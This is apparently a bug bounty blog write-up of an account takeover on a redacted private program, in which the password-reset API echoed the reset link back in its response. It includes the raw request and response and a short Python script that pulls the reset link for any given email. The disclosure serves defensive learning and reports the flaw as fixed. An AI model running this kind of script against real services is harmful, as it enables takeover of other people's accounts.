Account Take over via reset password
Hi
The old story was deleted as per team request , it was containing a reference that discloses the program , if this also may cause any type of impact , please reach me to edit or delete .
Recently i have been asked many times by Hackerone hackers about my last finding which appeared on hacktivity page disclosing the bounty , Ok i’m discussing it here.
It’s was 17 June , and Egypt has been defeated 0:1 by Uruguay :(.
All Egyptians are sad and complaining , the same as i, i have to find something that may make my day and forget what Gimenez scored .
Five days before , I got invited by Xprogram which is private on hackerone , sorry for redacting and not disclosing it.
Let’s take a look , After some reconnaissance , i managed to test the login function which is my favorite .
I tried to reset my password , navigated to
https://app.xprogram.com/account/forget_passwordI filled my email and submitted the request , To be honest i sent the request to burp repeater/intruder to find if i can inject random host header or see if it’s vulnerable to brute force so we may report a missing rate limit or try token generation guessing attack by reverse-engineering tokens .
The main application was sitting on app.xprogram.com and all requests were being sent cross-domain to their API at api.xprogram.com
So if you managed to reset or login you have to navigate to
https://app.xprogram.com/accountAnd a cross domain request will be issued to api.xprogram.com depending on what action you want to proceed
This is not necessary to speak about , but i’m giving an excuse for the developer who made the mistake and printed all parameters back .
The vulnerability we are talking about is returning all parameters back in HTTP response.
Anyway, the final request when you press send me link to reset my password
POST /access/forgotPassword HTTP/1.1
Host: api.xprogram.com
User-Agent: Mozilla
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/json;charset=utf-8
Referer: https://app.xprogram.com/account/forgot-password
Content-Length: 52
origin: https://app.xprogram.com
Cookie: redacted=yes;
Connection: close
{“email”:”foobar@gmail.com”}The shock
The response was :
HTTP/1.1 200 OK{“name”:”send-email”,”resetPasswordLink”:”https://app.xprogram.com/account/reset-password?token=xxxxxxxxxzzzzzzzzyyyyyyyy" , “many-other-parameters”:”many values”}
Really , yes the reset-password link was returned in response.
The report was too short ,
>
guys the reset-password link is returned in response , any one can hack anyone
I said it’s not enough , i wrote a python script to help the team to easily replicate the exploit.
#!/bin/python
import sys, requests
print ‘ — — — — — — — — — — — — — — — — — — \n\n’
em=sys.argv[1]
try:
burp0_url = “https://api.xprogram.com:443/access/forgotPassword"
burp0_cookies = {“cookie_not_useful”:”vallxxx”}
burp0_headers = { “User-Agent”: “Mozilla”, “Accept”: “application/json, text/plain, */*”, “Accept-Language”: “en-US,en;q=0.5”, “Content-Type”: “application/json;charset=utf-8”, “Referer”: “https://app.xprogram.com/account/forgot-password", “origin”: “https://app.xprogram.com", “Connection”: “close”}
burp0_json={“email”: em, “language”: “en”}
r=requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, json=burp0_json)
print r.text.encode(‘utf-8’).split(‘resetPasswordLink”:”’)[1].split(‘“‘)[0]
except:
print errorWhen running the script with email as argument
As said before , the response will contain the link to reset any password .
Yeah , these 17 lines are able to hack any account on the platform.
The script was unnecessary but it helped them , and i got a nice feedback for it.
I had a very nice experience , i accidentally violated the terms , however the team was tolerant and respectful and did not cancel my invitation.
Tip:Always review responses carefully .
Happy hacking ,
TimeLine
June 17, 2018 12:18:58 Reported
June 18, 2018 02:12:15 Triaged
June 18, 2018 14:45:26 Fixed
June 18, 2018 14:46:05 Bounty awarded 1500$
